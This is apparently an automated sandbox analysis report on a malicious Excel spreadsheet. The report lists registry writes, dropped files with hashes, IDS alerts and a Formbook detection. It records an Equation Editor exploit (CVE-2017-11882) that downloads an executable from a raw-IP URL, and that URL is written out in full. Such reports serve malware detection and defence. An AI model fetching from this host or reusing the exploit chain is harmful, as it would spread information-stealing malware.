(PID) Process:	(1492) EXCEL.EXE	Key:	HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:	write	Name:	1033
Value: On
(PID) Process:	(1492) EXCEL.EXE	Key:	HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:	write	Name:	1041
Value: On
(PID) Process:	(1492) EXCEL.EXE	Key:	HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:	write	Name:	1042
Value: On
(PID) Process:	(1492) EXCEL.EXE	Key:	HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:	write	Name:	1046
Value: On
(PID) Process:	(1492) EXCEL.EXE	Key:	HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:	write	Name:	1036
Value: On
(PID) Process:	(1492) EXCEL.EXE	Key:	HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:	write	Name:	1031
Value: On
(PID) Process:	(1492) EXCEL.EXE	Key:	HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:	write	Name:	1040
Value: On
(PID) Process:	(1492) EXCEL.EXE	Key:	HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:	write	Name:	1049
Value: On
(PID) Process:	(1492) EXCEL.EXE	Key:	HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:	write	Name:	3082
Value: On
(PID) Process:	(1492) EXCEL.EXE	Key:	HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:	write	Name:	1055
Value: On

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
1492	EXCEL.EXE	C:\Users\admin\AppData\Local\Temp\CVRBD5F.tmp.cvr		—
		MD5:—	SHA256:—
1492	EXCEL.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DCB66A7B.emf		binary
		MD5:6B54269F3B0EB61EAFA903D15B49F68F	SHA256:12811A4AB97A1A6764709C0D298A7D5EF9C58102A9AAF7C23E18024BB6267B59
1492	EXCEL.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\49B36A40.emf		binary
		MD5:AB3C71DADD57C96DE74236A677761633	SHA256:BE0B0602293E0078A54D37F29B03C21091D4450EDCF827A577D376E670A2C445
1492	EXCEL.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9AB1E541.emf		binary
		MD5:A01B9617553432807B9B58025B338D97	SHA256:7A0426ED2E2349916969FF7087C0F76089FB8CE7F4627F3D11CCBC1AAEFCEDCE
1492	EXCEL.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C3B9DFE2.emf		binary
		MD5:4A103FC1809C8EA381D2ACB5380EF4F6	SHA256:1AB8F5ABD845FFD0C61A61BB09BFCF20569B80B4496BCCB58C623753CF40485C
1492	EXCEL.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1FB98A4E.emf		binary
		MD5:B10FFD43A43F55F6B43167A45E2F5157	SHA256:6952BA72EB75E7D085B25D394D7CB8942710E24347E24F1D523A88BB0BE14C98
2508	EQNEDT32.EXE	C:\Users\admin\AppData\Roaming\audiodgse.exe		executable
		MD5:89E7A2A15D1A8EAFF2F2570F39532C1C	SHA256:356025114ED69404543712922762409938A37D54CABD294C661D844CC547FC52
1492	EXCEL.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B2519F7.emf		binary
		MD5:D69C22A341E111FEEA69DF6D8C655D60	SHA256:05B2053BF1D070D6034B45CD79B54D80DA3C6D88D016671A345E75048B1A68DB
1492	EXCEL.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E259BB8C.emf		binary
		MD5:35E141964E2698FC12D087516D116C9A	SHA256:6A3A2ADDC5D6B554EED64B7C24B699E09BCF019E4F42AB14EC6D40C7CB749538
2508	EQNEDT32.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K78MRVB5\smss[1].exe		executable
		MD5:89E7A2A15D1A8EAFF2F2570F39532C1C	SHA256:356025114ED69404543712922762409938A37D54CABD294C661D844CC547FC52

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
2508	EQNEDT32.EXE	GET	200	103.72.68.128:80	http://103.72.68.128/T1710W/smss.exe	unknown	executable	1.04 Mb	unknown

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
4	System	192.168.100.255:138	—	—	—	whitelisted
324	svchost.exe	224.0.0.252:5355	—	—	—	unknown
4	System	192.168.100.255:137	—	—	—	whitelisted
1956	svchost.exe	239.255.255.250:1900	—	—	—	whitelisted
2508	EQNEDT32.EXE	103.72.68.128:80	—	—	—	unknown

DNS requests

No data

Threats

PID	Process	Class	Message
2508	EQNEDT32.EXE	Potentially Bad Traffic	ET INFO Executable Download from dotted-quad Host
2508	EQNEDT32.EXE	Potentially Bad Traffic	ET HUNTING Suspicious smss.exe in URI
2508	EQNEDT32.EXE	A Network Trojan was detected	ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1
2508	EQNEDT32.EXE	Potential Corporate Privacy Violation	ET POLICY PE EXE or DLL Windows file download HTTP
2508	EQNEDT32.EXE	Potentially Bad Traffic	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response
2508	EQNEDT32.EXE	A Network Trojan was detected	ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2

1 ETPRO signatures available at the full report

Add for printing

No debug info

General Info

九月声明 40981675.xls

BEBDE97040EEECB866DB4F6EFF2A0F3C

EEF9D50A9EE55ACC5C4C389D5A0F3105A14CCF96

95F512905D4B5EBE18EC19E3A3B2DFFBD727E91FDC0177667512B44FC7F5D857

49152:aTlbNqjBHZdFtSgJLP6J5sAT1vNyUOF+4u31a0mF9EdFi3LaCDNzYsAW5sAT1vNZ:exqJXSgJLP67sAkFkWLZDR1JsA+FVWL3

Software environment set and analysis options

Launch configuration

Software preset

Behavior activities

MALICIOUS

Suspicious connection from the Equation Editor

Equation Editor starts application (CVE-2017-11882)

Application was dropped or rewritten from another process

Drops the executable file immediately after the start

FORMBOOK has been detected (YARA)

SUSPICIOUS

Reads the Internet Settings

Connects to the server without a host name

Process requests binary or script from the Internet

Application launched itself

Starts CMD.EXE for commands execution

INFO

Reads the machine GUID from the registry

Reads the computer name

Checks supported languages

Checks proxy server information

Creates files or folders in the user directory

Manual execution by a user

Malware configuration

Formbook

Static information

TRiD

EXIF

FlashPix

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Malware configuration

Formbook

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings